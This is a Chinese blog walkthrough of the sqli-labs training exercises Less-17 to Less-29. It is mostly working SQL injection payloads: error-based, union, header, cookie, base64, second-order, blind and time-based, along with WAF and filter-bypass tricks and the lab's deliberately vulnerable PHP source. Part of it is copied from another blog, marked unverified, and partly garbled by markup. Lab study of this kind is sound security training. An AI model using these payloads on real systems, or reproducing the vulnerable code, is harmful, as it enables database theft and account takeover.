    uname=admin&passwd=admin' and? updatexml(1,concat(0x7e,(select password from (select password from users where username='admin'))),1) --+ &submit=Submit

    查了一下加個名,就完事了

    最終payload:

    uname=admin&passwd=11' and updatexml(1,concat(0x7e,(select password from (select password from users where username='admin') mingzi ),0x7e),1) --+&submit=Submit

    也可以用:

    uname=admin&passwd=11' and updatexml(1,concat(0x7e,(select password from (select password from users limit 7,1) test ),0x7e),1) --+&submit=Submit

    注入完成。

    ?

    Less-18 POST - Header Injection - Uagent field - Error based (基于錯誤的用戶代理,頭部POST注入)

    報錯型,單引號,user-agent型注入點。

    看到user-agent的回顯,猜測注入點在user-agnet,可以直接測試,但是我去看看php文件吧:

    我靠,真是說啥來啥,上一題還說passwrod沒做check,這題就做了,

    又看到 insert語句,他把user-agent插入到了數(shù)據(jù)庫,所以可以從這里下手,而且看的出來是單引號型,接下來開始爆破。

    抓包修改user-agent為一下payload就可以了。

    ?

    測試爆庫payload

    'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '

    沒毛病,可以爆破

    接下來的步驟和之前的報錯型注入一摸一樣,

    payload可以參看,less-12 雙引號報錯型注入,只需要把雙引號改為單引號就可以作為本題的payload,這里就不再贅述。

    樣例爆庫payload:

    User-Agent:'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '

    注入結(jié)束。

    ?

    ?

    Less-19 POST - Header Injection - Referer field - Error based (基于頭部的Referer POST報錯注入)

    單引號,報錯型,referer型注入點。

    本題和上一題很像,回顯是referer,查一下php文件可以發(fā)現(xiàn),insert語句中向數(shù)據(jù)庫插入了referer,所以注入點改為referer,paylaod和上一題完全一樣,也可以參照less-12,將其雙引號改為單引號作為本題payload,不再贅述。

    樣例爆庫payload:

    Referer:'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '

    注入結(jié)束。


    Page-2 (Advanced Injections)

    ?

    ?

    Less-20 POST - Cookie injections - Uagent field? - Error based (基于錯誤的cookie頭部POST注入)

    單引號,報錯型,cookie型注入。

    登錄后頁面:

    查看一下php文件,

    可以看到查詢語句查詢了cookee,那我們就在cookies里面進行注入

    抓包看一下:

    看到cookie:uname=admin 沒毛病就是cookie注入了

    價格單引號發(fā)現(xiàn):

    爆出語法錯誤,看得出來就是單引號型。

    加下來查一下行數(shù)

  • Cookie: uname=admin' order by 3--+ //1-3 正常
  • Cookie: uname=admin' order by 4--+ //4 不正常 ,確定行數(shù)為3
  • 爆庫payload

    Cookie: uname=-admin' union select 1,2,database()--+

    爆破成功。

    接下來又是重復性的步驟,只需要在第三個查詢位置修改payload就可以完成sql注入,有需要可以查看less-1中的payload構(gòu)造,很本題十分相似。

    這里不再贅述。

    注入結(jié)束。

    ?

    Less-21 Cookie Injection- Error Based- complex - string?( 基于錯誤的復雜的字符型Cookie注入)

    base64編碼,單引號,報錯型,cookie型注入。

    本關(guān)和less-20相似,只是cookie的uname值經(jīng)過base64編碼了。

    登錄后頁面:

    圈出來的地方顯然是base64加密過的,解碼得到:admin,就是剛才登陸的uname,所以猜測:本題在cookie處加密了字符串,

    查看php文件確實如此,所以只需要上傳paylaod的時候base64加密一下就可以了。

    先抓包看一下:

    看到cookie是YWRtaW4%3D ,和頁面顯示不一樣,但是明顯%3D 是=號urldecode的結(jié)果,接下來構(gòu)造paylaod進行測試

  • admin' and 1=1 --+ //明文
  • YWRtaW4nIGFuZCAxPTEgLS0r //密文
  • 看到紅圈處的提示,所以應該構(gòu)造 ') 這種的?

    這里就不演示爆行數(shù)了,上一題已經(jīng)做過了。

    經(jīng)過我多次測試,--+在此處不好用,需要使用#來注釋。

    ?

    示例爆庫paylaod:

  • -admin') union select 1,2,database()#
  • LWFkbWluJykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIw==
  • 接下來只需要修改第三條查詢語句,和less-20一樣(注意用#注釋,而不用--+),只要base64加密后寫入cookie,就可以完成注入,不再贅述。

    注入完成。

    ?

    ?

    Less-22 Cookie Injection- Error Based- Double Quotes - string (基于錯誤的雙引號字符型Cookie注入)

    base64編碼,雙引號,報錯型,cookie型注入。

    和less-21一樣的,只需要使用雙引號代替單引號再取掉括號,一樣的配方一樣的味道。

    不再贅述。

    樣例payload

  • -admin" union select 1,2,database()#
  • LWFkbWluIiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj
  • 注入完成。

    ?

    ?

    Less-23 GET - Error based - strip comments (基于錯誤的,過濾注釋的GET型)

    基于錯誤-無評論

    這道題不看php很蒙,我試了半天還是去看php了:

    看到替換了能用的注釋符,所以我們構(gòu)造閉合語句:

    爆庫payload

    ?id=' union select 1,2,database() '

    爆表payload

    ?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() or '1'= '

    爆列名payload

    ?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' or '1'= '

    爆值payload

    ?id=' union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '

    ?

    注入完成。

    ?

    ?

    Less - 24 Second Degree Injections??*Real treat* -Store Injections (二次注入)

    二次注入

    我們的步驟是

    1.注冊一個admin'#的賬號。

    2.登錄admin'#該,修改該帳號的密碼,此時修改的就是admin的密碼,我修改為123456。

    Sql語句變?yōu)閁PDATE users SET passwd="New_Pass" WHERE username =' admin' # ' AND password='

    也就是執(zhí)行了UPDATE users SET passwd="New_Pass" WHERE username =' admin'

    成功的話跳轉(zhuǎn)頁面會提示Password successfully updated

    3.用剛修改的密碼我的是123456,登陸admin管理員賬號,就可以成功登陸。

    ?

    注入結(jié)束。

    ?

    ?

    Less-25 Trick with OR & AND (過濾了or和and)

    OR & AND 欺騙

    測試一下

  • payload
  • ?id=1' #
  • Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in F:\WhiteFlie\PhpStudy20180211\PHPTutorial\WWW\sqli-labs\Less-25\index.php on line 37
  • You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
  • payload
  • ?id=1' --+
  • Your Login name:Dumb
  • Your Password:Dumb
  • 看到id周圍全是單引號,

    但是第二種payload沒有報錯,可以注入。

    方法一,--+繞過,一般注入。

    樣例payload

    ?id=-1' union select 1,2,database()--+

    有必要說一下這題在爆值的時候?qū)assword進行了處理,查詢password列,回顯no column passwd,所以雙寫or繞過

    同理information也是。

    樣例paload

    ?id=-1' union select 1,2,group_concat(username,0x7e,passwoorrd) from users--+

    ?

    方法二,雙寫or或and繞過

    測試payload

  • ?id=0' oorr 1=1 --+
  • ?id=2' aandnd 1=1 --+
  • or and形成閉合語句,sql查詢,不再贅述。

    注入結(jié)束。

    ?

    Less-25a?Trick with OR & AND Blind (過濾了or和and的盲注)

    那么盲注怎么判斷過濾了and跟or呢,直接在前面添加or或and

    ?

    不同于25關(guān)的是sql語句中對于id,沒有''的包含,同時沒有輸出錯誤項,報錯注入不能用。其余基本上和25示例沒有差別。

    ?

    此處采取兩種方式:延時注入和聯(lián)合注入。

    http://10.10.10.139/sql/Less-25a/?id=-1%20||%20if(length(database())=8,1,sleep(5))# http://10.10.10.139/sql/Less-25a/?id=-1%20union%20select%201,database(),3#

    ?

    Less-26(failed) Trick with comments and space (過濾了注釋和空格的注入)

    ?評論欺騙

    測試半天,沒什么進展,查一下php文件

  • // take the variables
  • if(isset($_GET['id']))
  • {
  • $id=$_GET['id'];
  • //logging the connection parameters to a file for analysis.
  • $fp=fopen('result.txt','a');
  • fwrite($fp,'ID:'.$id."\n");
  • fclose($fp);
  • //fiddling with comments
  • $id= blacklist($id);
  • //echo "<br>";
  • //echo $id;
  • //echo "<br>";
  • $hint=$id;
  • // connectivity
  • $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  • $result=mysql_query($sql);
  • $row = mysql_fetch_array($result);
  • if($row)
  • {
  • echo "<font size='5' color= '#99FF00'>";
  • echo 'Your Login name:'. $row['username'];
  • echo "<br>";
  • echo 'Your Password:' .$row['password'];
  • echo "</font>";
  • }
  • else
  • {
  • echo '<font color= "#FFFF00">';
  • print_r(mysql_error());
  • echo "</font>";
  • }
  • }
  • else { echo "Please input the ID as parameter with numeric value";}
  • function blacklist($id)
  • {
  • $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
  • $id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
  • $id= preg_replace('/[\/\*]/',"", $id); //strip out /*
  • $id= preg_replace('/[--]/',"", $id); //Strip out --
  • $id= preg_replace('/[#]/',"", $id); //Strip out #
  • $id= preg_replace('/[\s]/',"", $id); //Strip out spaces
  • $id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
  • return $id;
  • }
  • 可以看到function blacklist($id) 來了個過濾全家桶,$id 周圍是單引號,過濾了 or,and , /* , – , # , 空格 , /

    *********************************************************************************************************************************

    到這里就出現(xiàn)問題了,從本題到28a,都注入失敗,估計是下面這種情況,難受的是我linux虛擬機出問題了,現(xiàn)在還沒搞好,這幾天之內(nèi)會回來搞定的。

    注意:本關(guān)可能有的朋友在windows下無法使用一些特殊的字符代替空格,此處是因為apache的解析的問題,這里請更換到Linux平臺下。

    ?

    *************************************************************************************************************************************

    ?

    ?

  • ?id='%a0uNion%a0sElect(1),(database()),(3) or (1)='1 爆數(shù)據(jù)庫
  • ?id='%a0uNion%a0sElect(1),(group_concat(table_name)),(3)%a0from%a0information_schema.tables%a0where%a0table_schema='security'%26%26%a0%271%27=%271 爆表
  • ?id='%a0uNion%a0sElect(1),group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0%26%26%a0table_name='emails'%26%26%a0%271%27=%271 爆列
  • ?id='%a0uNion%a0sElect(1),group_concat(email_id),3%a0from%a0emails%a0uniOn%a0seLect (1),2,'3 提取數(shù)據(jù)
  • ?這題做不下去了


    /*26-28轉(zhuǎn)https://blog.csdn.net/nzjdsds/article/details/77430073#t9*/

    • /*以下26-28未經(jīng)驗證*/

    less 26 ?Trick with comments and space (過濾了注釋和空格的注入)

  • 確認過濾了#
  • http://10.10.10.139/sql/Less-26/?id=%231
  • 確認過濾了or
  • http://10.10.10.139/sql/Less-26/?id=or1
  • 確認過濾多行注釋符
  • http://10.10.10.139/sql/Less-26/?id=/*1
  • 確認過濾了單行注釋
  • http://localhost/sqli-labs/Less-26/?id=--1
  • 確認過濾了斜杠
  • http://10.10.10.139/sql/Less-26/?id=/1
  • 確認過濾了反斜杠
  • http://10.10.10.139/sql/Less-26/?id=\
  • 確認過濾了空格,報錯注入才行哦,這個判斷
  • http://10.10.10.139/sql/Less-26/?id=1' ' '

  • 源碼部分

  • $id= preg_replace('/or/i',"", $id);
  • $id= preg_replace('/and/i',"", $id);
  • $id= preg_replace('/[\/\*]/',"", $id);
  • $id= preg_replace('/[--]/',"", $id);
  • $id= preg_replace('/[#]/',"", $id);
  • $id= preg_replace('/[\s]/',"", $id);
  • $id= preg_replace('/[\/\\\\]/',"", $id);
  • ?

    下面看看繞過吧,看著都難繞,這次就提取完整的數(shù)據(jù)吧,

    我們常見的繞過空格的就是多行注釋,/**/但這里過濾了,所以這行不通,

    ?

    將空格,or,and,/*,#,--,/等各種符號過濾,此處對于and,or的處理方法不再贅述,參考25.此處我們需要說明兩方面:對于注釋和結(jié)尾字符的我們此處只能利用構(gòu)造一個 ' 來閉合后面到 ' ;對于空格,有較多的方法:

    ?

    %09 TAB鍵(水平)

    %0a 新建一行

    %0c 新的一頁

    %0d return功能

    %0b TAB鍵(垂直)

    %a0 空格

    ?

    注意:本關(guān)可能有的朋友在windows下無法使用一些特殊的字符代替空格,此處是因為apache的解析的問題,這里請更換到Linux平臺下。

    ?

    sql語句為:SELECT * FROM users WHERE id='$id' LIMIT 0,1

    ?

    我們首先給出一個最為簡單的payload:

    http://127.0.0.1/sqllib/Less-26/?id=1'%a0||'1

    ?

    Explain:'%a0||'1

    同時,我們此處的sql語句為SELECT * FROM users WHERE id='1' || '1' LIMIT 0,1

    ?

    第一個 ' 首先閉合id='$id' 中的',%a0是空格的意思,

    ?

    (ps:此處我的環(huán)境是ubuntu14.04+apache+mysql+php,可以解析%a0,此前在windows+wamp測試,不能解析%a0,有知情的請告知。)

    ?

    同時%0b也是可以通過測試的,其他的經(jīng)測試是不行的。||是或者的意思,'1則是為了閉合后面的 ' 。

    ?

    注意在hackbar中輸入&&時,需要自行URL編碼為%26%26,否則會報錯,而輸入||不需要

    ?

    確認字段數(shù)

    http://10.10.10.139/sqli/Less-26/?id=0%27union%a0select%a01,2,3,4%a0%26%26%a0%271%27=%271

    http://10.10.10.139/sqli/Less-26/?id=0%27union%a0select%a01,2,3%a0%26%26%a0%271%27=%271

    查數(shù)據(jù)庫名

    http://10.10.10.139/sql/Less-26/?id=0'union%a0select%a01,database(),3%26%26'1'='1

    ?

    ?

    中間補充一個函數(shù)group_concat()

    ?

    能將同行的內(nèi)容組合一起顯示出來

    ?

    詳解傳輸

    ?

    查表名(information里面有一個or會被過濾掉所以需要雙寫infoorrmation)(這里用&&)

    http://10.10.10.139/sql/Less-26/?id=0%27union%a0select%a01,group_concat(table_name),3%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema='security'%26%26%a0'1%27='1

    ?

    ?

    查字段名(這里需要注意and也需要雙寫)

    ?

    http://10.10.10.139/sql/Less-26/?id=0'%0bunion%0bselect%0b1,group_concat(column_name),3%0bfrom%0binfoorrmation_schema.columns%0bwhere%0btable_schema='security'%0baandnd%0btable_name='users'%0b%26%26%0b'1'='1

    ?

    查數(shù)據(jù)

    http://10.10.10.139/sql/Less-26/?id=0'%a0union%a0select%a01,group_concat(username),3%a0from%a0users%a0where%a0'1%27='1

    ?

    ?

    也可以一起查

    ?

    http://10.10.10.139/sql/Less-26/?id=0'%a0union%a0select%a01,group_concat(username,passwoorrd),3%a0from%a0users%a0where%a0'1%27='1

    ?

    這里不同的是后面多了where '1'='1,是為了讓語句變成無約束查詢

    ?

    詳解where 1=1

    ?

    還有一種就是用連接符結(jié)合上幾天xpath報錯獲取信息來獲取信息:

    http://10.10.10.139/sql/Less-26/?id=-1'||updatexml(1,concat('~',database(),'~'),3)||'

    具體的我就演示了,方法可以有很多的,小伙伴們可以自行嘗試

    ?

    less 26a GET - Blind Based - All your SPACES and COMMENTS belong to us(過濾了空格和注釋的盲注)

    ?

    這關(guān)與26的區(qū)別在于,sql語句添加了一個括號,同時在sql語句執(zhí)行拋出錯誤后并不在前臺頁面輸出。所有我們排除報錯注入,這里依舊是利用union注入。

    ?

    sql語句為 ? SELECT * FROM users WHERE id=('$id') LIMIT 0,1

    ?

    ?

    查數(shù)據(jù)庫名

    http://10.10.10.139/sql/Less-26a/?id=100')%0bunion%0bselect%0b1,database(),3%0b||('1')=('1


    ?

    查表名

    http://10.10.10.139/sql/Less-26a/?id=100')%0bunion%0bselect%0b1,group_concat(table_name),3%0bfrom%0binfoorrmation_schema.tables%0bwhere%0btable_schema='security'%26%26('1')=('1

    查字段名

    http://10.10.10.139/sql/Less-26a/?id=100')%0bunion%0bselect%0b1,group_concat(column_name),3%0bfrom%0binfoorrmation_schema.columns%0bwhere%0btable_schema='security'%0baandnd%0btable_name='users'%26%26('1')=('1



    查數(shù)據(jù)

    http://10.10.10.139/sql/Less-26a/?id=100')%0bunion%0bselect%0b1,group_concat(passwoorrd),3%0bfrom%0busers%0bwhere%0b('1')=('1

    ?

    ?

    http://10.10.10.139/sql/Less-26a/?id=100')%0bunion%0bselect%0b1,group_concat(passwoorrd,username),3%0bfrom%0busers%0bwhere%0b('1')=('1



    ?

    接下來的我換了Ubuntu的環(huán)境去測試,之前是win2003+phpstudy的環(huán)境,因為27關(guān)在這里面就不會報錯了,我也不知道為什么,換了一個環(huán)境就好了

    ?

    less 27 GET - Error Based- All your UNION & SELECT belong to us (過濾了union和select的)

    ?

    老樣子先看看是否過濾了單引號,發(fā)現(xiàn)是過濾的

    ?


    ?

    ?

    是否過濾空格,也是過濾的

    ?

    ?

    看是否過濾關(guān)鍵字

    ?

    也是過濾的,但是大小寫可以突破的

    ?

    看下源碼

    ?

    m?(PCRE_MULTILINE)默認情況下,PCRE 認為目標字符串是由單行字符組成的(然而實際上它可能會包含多行), "行首"元字符 (^) 僅匹配字符串的開始位置, 而"行末"元字符 ($) 僅匹配字符串末尾, 或者最后的換行符(除非設(shè)置了?D?修飾符)。這個行為和 perl 相同。?當這個修飾符設(shè)置之后,“行首”和“行末”就會匹配目標字符串中任意換行符之前或之后,另外, 還分別匹配目標字符串的最開始和最末尾位置。這等同于 perl 的 /m 修飾符。如果目標字符串 中沒有 "\n" 字符,或者模式中沒有出現(xiàn) ^ 或 $,設(shè)置這個修飾符不產(chǎn)生任何影響。s?(PCRE_DOTALL)如果設(shè)置了這個修飾符,模式中的點號元字符匹配所有字符,包含換行符。如果沒有這個 修飾符,點號不匹配換行符。這個修飾符等同于 perl 中的/s修飾符。 一個取反字符類比如 [^a] 總是匹配換行符,而不依賴于這個修飾符的設(shè)置。/m ?當設(shè)定了此修正符,“行起始”和“行結(jié)束”除了匹配整個字符串開頭和結(jié)束外,還分別匹配其中的換行符的之后和之前。這和 Perl 的 /m 修正符是等效的。如果目標字符串中沒有“\n”字符或者模式中沒有 ^ 或 $,則設(shè)定此修正符沒有任何效果。 ?實際上就就是匹配多行的意思?

    ?

    /s 使圓點元字符(.)匹配換行符, ?上面這里沒有點就不用管了,那么上面直接大小寫繞過就可以了

    ?

    爆數(shù)據(jù)庫

    http://10.10.10.141/sql/Less-27/?id=0'%a0uniOn%a0sElEct%a01,database(),3%a0or%a0'1'='1?


    ?

    這里的or '1 ' = '1是為了閉合和后的' 變成or '1'='1' limit 1,1 ? 讓語句完整

    ?

    查表名 ? ?(這里需要把or換成&&(%26%26))

    http://10.10.10.141/sql/Less-27/?id=0'%a0uniOn%a0sElEct%a01,(group_concat(table_name)),3%a0from%a0information_schema.tables%a0where%a0table_schema='security'%a0%26%26%a0'1'='1

    查字段名

    http://10.10.10.141/sql/Less-27/?id=0'%a0uniOn%a0sElEct%a01,(group_concat(column_name)),3%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0And%a0table_name='users'%a0%26%26%a0'1'='1?

    查數(shù)據(jù)

    http://10.10.10.141/sql/Less-27/?id=0'%a0uniOn%a0sElEct%a01,(group_concat(username)),3%a0from%a0users%a0uniOn%a0seLect%a01,2,'3


    ?

    在查數(shù)據(jù)的時候我參考的那個語句是

    http://10.10.10.141/sql/Less-27/?id=0'%a0uniOn%a0sElEct%a01,(group_concat(username)),3%a0from%a0users%a0uniOn%a0seLect (1),(2),'(3

    后來我把最后后面聯(lián)合查詢的 ? ? ? ?括號 ? ? 都去掉,發(fā)現(xiàn)都沒問題就是把 ? ?1 ? 的括號去掉的時候報錯了,然后我在前面加個%a0又正常了,我的猜想大概是原作者是為了防止空格被過濾 ? 然后后面的參數(shù)會跟前面的參數(shù)黏在一起發(fā)生了錯誤,加上了括號即使被過濾也可以讓系統(tǒng)來區(qū)分不至于報錯。

    這是原作者的語句

  • <span style="color:#000000;">http</span><span style="color:#666600;">:</span><span style="color:#880000;">//localhost/sqli-labs/Less-27/?id='%a0uNion%a0sElect(1),(database()),(3) or (1)='1 爆數(shù)據(jù)庫</span><span style="color:#000000;">
  • http</span><span style="color:#666600;">:</span><span style="color:#880000;">//localhost/sqli-labs/Less-27/?id='%a0uNion%a0sElect(1),(group_concat(table_name)),(3)%a0from%a0information_schema.tables%a0where%a0table_schema='security'%26%26%a0%271%27=%271 爆表</span><span style="color:#000000;">
  • http</span><span style="color:#666600;">:</span><span style="color:#880000;">//localhost/sqli-labs/Less-27/?id='%a0uNion%a0sElect(1),group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0%26%26%a0table_name='emails'%26%26%a0%271%27=%271 爆列</span><span style="color:#000000;">
  • http</span><span style="color:#666600;">:</span><span style="color:#880000;">//localhost/sqli-labs/Less-27/?id='%a0uNion%a0sElect(1),group_concat(email_id),3%a0from%a0emails%a0uniOn%a0seLect (1),2,'3 提取數(shù)據(jù)</span>
  • ://localhost/sqli-labs/Less-27/?id='%a0uNion%a0sElect(1),(database()),(3) or (1)='1 爆數(shù)據(jù)庫
  • http://localhost/sqli-labs/Less-27/?id='%a0uNion%a0sElect(1),(group_concat(table_name)),(3)%a0from%a0information_schema.tables%a0where%a0table_schema='security'%26%26%a0%271%27=%271 爆表
  • http://localhost/sqli-labs/Less-27/?id='%a0uNion%a0sElect(1),group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0%26%26%a0table_name='emails'%26%26%a0%271%27=%271 爆列
  • http://localhost/sqli-labs/Less-27/?id='%a0uNion%a0sElect(1),group_concat(email_id),3%a0from%a0emails%a0uniOn%a0seLect (1),2,'3 提取數(shù)據(jù)
  • ://localhost/sqli-labs/Less-27/?id='%a0uNion%a0sElect(1),(database()),(3) or (1)='1 爆數(shù)據(jù)庫 http://localhost/sqli-labs/Less-27/?id='%a0uNion%a0sElect(1),(group_concat(table_name)),(3)%a0from%a0information_schema.tables%a0where%a0table_schema='security'%26%26%a0%271%27=%271 爆表 http://localhost/sqli-labs/Less-27/?id='%a0uNion%a0sElect(1),group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0%26%26%a0table_name='emails'%26%26%a0%271%27=%271 爆列 http://localhost/sqli-labs/Less-27/?id='%a0uNion%a0sElect(1),group_concat(email_id),3%a0from%a0emails%a0uniOn%a0seLect (1),2,'3 提取數(shù)據(jù)

    都加了空格這樣用union select就可以避免空格了,就算空格被過濾也沒關(guān)系

    ?

    ?

    less 27a GET - Blind Based- All your UNION & SELECT belong to us

    ?

    這個是less 27的盲注版本,雙引號型的

    http://10.10.10.141/sql/Less-27a/?id=1"or "1"="1

    下面給出盲注的payload

    http://10.10.10.141/sql/Less-27a/?id=1"and(length(database())>7)%a0uNion%a0sELect%a01,2,"3

    http://10.10.10.141/sql/Less-27a/?id=1"and(length(database())>8)%a0uNion%a0sELect%a01,2,"3

    ?

    ?

    ?

    查數(shù)據(jù)庫

    http://10.10.10.141/sql/Less-27a/?id=1"%a0And%a0(length(database())>8)%a0uNion%a0sELect%a01,database(),"3

    ?

    查表名:

    ?

    查表面需要閉合后面雙引號我就用"1"="1來閉合,前面還需要&&(%26%26)并一起,要不然會顯示不出來,這個我經(jīng)常忘記,沒有就會出現(xiàn)這種情況

    ?

    http://10.10.10.141/sql/Less-27a/?id=1"%a0And%a0(length(database())>8)%a0uNion%a0sELect%a01,(group_concat(table_name)),3%a0from%a0information_schema.tables%a0where%a0table_schema='security'%a0%26%26%a0"1"%a0="1


    ?

    查字段名

    http://10.10.10.141/sql/Less-27a/?id=1"%a0And%a0(length(database())>8)%a0uNion%a0sELect%a01,(group_concat(column_name)),3%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0And%a0table_name='users'%26%26%a0"1"%a0="1

    ?

    查數(shù)據(jù)(注意這里需要把&&給去掉,我也是經(jīng)常忘記)

    http://10.10.10.141/sql/Less-27a/?id=-1"%a0And%a0(length(database())>8)%a0UNion%a0SElect%a0(1),(group_concat(username)),(3)from%a0users%a0UNion%a0SElect%a01,2,"3"="3


    ?

    ?

    這里的話提數(shù)據(jù)除了后面再接查詢語句外,還可以用where 1=1還提數(shù)據(jù),當然前面也同樣適用,只是我現(xiàn)在才想到

    http://10.10.10.141/sql/Less-27a/?id=-1"%a0And%a0(length(database())>8)%a0UNion%a0SElect%a0(1),(group_concat(username)),(3)from%a0users%a0where%a0"1"="1


    ?

    less 28 GET - Error Based- All your UNION & SELECT belong to us String-Single quote with parenthesis基于錯誤的,有括號的單引號字符型,過濾了union和select等的注入

    ?

    這里我需要說明下,我做題的時候不小心做錯了,一直以為是28題,后來才發(fā)現(xiàn)是28a的題目,然后我把測試語句放到28題里面測試了都一樣的,就是URL28后面多個a少個a的區(qū)別,這里我就不補充啦,太累了,做28你們可以參照下面的來做一樣的

    ?

    28a說是盲注,但是不知道為啥竟然可以報錯,這里我就把盲注的代碼也拿過來備用

    ?

    加紅的部分是我容易犯錯的地方,對于盲注大家還是用腳本跑的比較好

  • <span style="color:#333333;">長度是8
  • http://localhost/sqli-labs/Less-28a/?id=1')and(length(database())>7)and('1')=('1
  • http://localhost/sqli-labs/Less-28a/?id=1')and(length(database())>8)and('1')=('1
  • 第一個字符是115,即s
  • http://localhost/sqli-labs/Less-28a/?id=1')and(ascii(substr((</span>sElect%a0database()<span style="color:#333333;">),1,1))>114)and('1')=('1
  • http://localhost/sqli-labs/Less-28a/?id=1')and(ascii(substr((</span>sElect%a0database()<span style="color:#333333;">),1,1))>115)and('1')=('1</span>
  • sElect%a0database()),1,1))>114)and('1')=('1
  • http://localhost/sqli-labs/Less-28a/?id=1')and(ascii(substr((sElect%a0database()),1,1))>115)and('1')=('1
  • sElect%a0database()),1,1))>114)and('1')=('1
  • http://localhost/sqli-labs/Less-28a/?id=1')and(ascii(substr((sElect%a0database()),1,1))>115)and('1')=('1
  • ?

    ?

    ?

    ?

    less 28a GET - Bind Based- All your UNION & SELECT belong to us String-Single quote with parenthesis基于盲注的,有括號的單引號字符型,過濾了union和select等的注入

    ?

    ?

    開始之前我們需要打開源碼把里面的注釋給去除,增加挑戰(zhàn)難度

    ?

    ?

    ?

    ?

    ?

    那個i表示正在匹配的模式,i是忽略大小寫,\s就是匹配任意空白字符,制表符啊,換行啊空格啊等

    ?

    那我們中間不加空格能繞過吧還是用%a0吧

    ?

    ?

    老規(guī)矩,我先輸入單引號,然后雙引號,看報錯,猜測下語句里面用的是什么這里我用單引號報錯了,然而雙引號沒有報錯

    ?

    單引號

    ?

    雙引號

    ?

    ?

    然后輸入(,看會不會報錯

    http://10.10.10.141/sql/Less-28a/?id=1)''

    ?

    后面單引號是閉合原來語句的單引號,加上)沒錯,說明原來的語句有括號

    ?

    語句可能就是 select *from users where id=('xxx')

    ?

    查數(shù)據(jù)庫

    http://10.10.10.141/sql/Less-28a/?id=0')UNion%a0SElect%a01,database(),('3')=('3

    或者這樣可以的,主要關(guān)注的是需要閉合原語句后面的')

    http://10.10.10.141/sql/Less-28a/?id=0')UNion%a0SElect%a01,database(),3%a0or%a0('1')=('1

    ?

    ?

    查表名:(這里別忘記把or換成&&)

    http://10.10.10.141/sql/Less-28a/?id=0')UNion%a0SElect%a01,(group_concat(table_name)),3%a0from%a0information_schema.tables%a0where%a0table_schema='security'%a0%26%26%a0('1')=('1

    ?

    ?

    查字段名

    http://10.10.10.141/sql/Less-28a/?id=0')UNion%a0SElect%a01,(group_concat(column_name)),3%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0ANd%a0table_name='users'%a0%26%26%a0('1')=('1


    ?

    查數(shù)據(jù)(把&&換成where)

    ?

    http://10.10.10.141/sql/Less-28a/?id=0')UNion%a0SElect%a01,(group_concat(username)),3%a0from%a0users%a0where%a0('1')=('1

    ?

    還有這個

    http://10.10.10.141/sql/Less-28a/?id=0')UNion%a0SElect%a01,(group_concat(username)),3%a0from%a0users%a0UNion%a0SELect%a01,2,('3')=('3


    • /*以上26-28未經(jīng)驗證*/

    • /*接下來是我自己做的了*/

    Less-29 基于WAF的一個錯誤

    用WAF防護

    測試:輸入雙引號正常,輸入一個引號發(fā)生錯誤,兩個引號正常

    那么語句可能是 select * from users where id='xx' limit 1,1

    嘗試注入payload:

    ?id=-1' union select 1,2,database()--+

    庫爆出來了,后面步驟一樣,該干嘛干嘛就完事了。

  • ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
  • ?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
  • ?id=-1' union select 1,2,group_concat(username,0x7e,password) from users--+
  • 啥玩意啊,什么world's best firewall 直接查完了,過于簡單不再贅述。

    ?

    我閑的dan疼去查了一下waf繞過方法,大佬們是這么說的;

    waf是只允許輸入數(shù)字的,我們在輸入數(shù)字的時候先給waf看然后檢測正常后才轉(zhuǎn)發(fā)給我們需要訪問的頁面,那篇文章是有寫到的,這里我弄2個值,一個是用來欺騙waf的。另一個才是給我們需要訪問頁面的

    看一下這篇博客,http://blog.csdn.net/nzjdsds/article/details/77758824

    再結(jié)合源碼了解一下:

  • <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  • <html xmlns="http://www.w3.org/1999/xhtml">
  • <head>
  • <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  • <title>Less-29 Protection with WAF</title>
  • </head>
  • <body bgcolor="#000000">
  • <div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
  • <font size="3" color="#FFFF00">
  • <?php
  • //including the Mysql connect parameters.
  • include("../sql-connections/sql-connect.php");
  • //disable error reporting
  • error_reporting(0);
  • // take the variables
  • if(isset($_GET['id']))
  • {
  • $id=$_GET['id'];
  • //logging the connection parameters to a file for analysis.
  • $fp=fopen('result.txt','a');
  • fwrite($fp,'ID:'.$id."\n");
  • fclose($fp);
  • $qs = $_SERVER['QUERY_STRING'];
  • $hint=$qs;
  • // connectivity
  • $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  • $result=mysql_query($sql);
  • $row = mysql_fetch_array($result);
  • if($row)
  • {
  • echo "<font size='5' color= '#99FF00'>";
  • echo 'Your Login name:'. $row['username'];
  • echo "<br>";
  • echo 'Your Password:' .$row['password'];
  • echo "</font>";
  • }
  • else
  • {
  • echo '<font color= "#FFFF00">';
  • print_r(mysql_error());
  • echo "</font>";
  • }
  • }
  • else { echo "Please input the ID as parameter with numeric value";}
  • ?>
  • </font> </div></br></br></br><center>
  • <img src="../images/Less-29.jpg" />
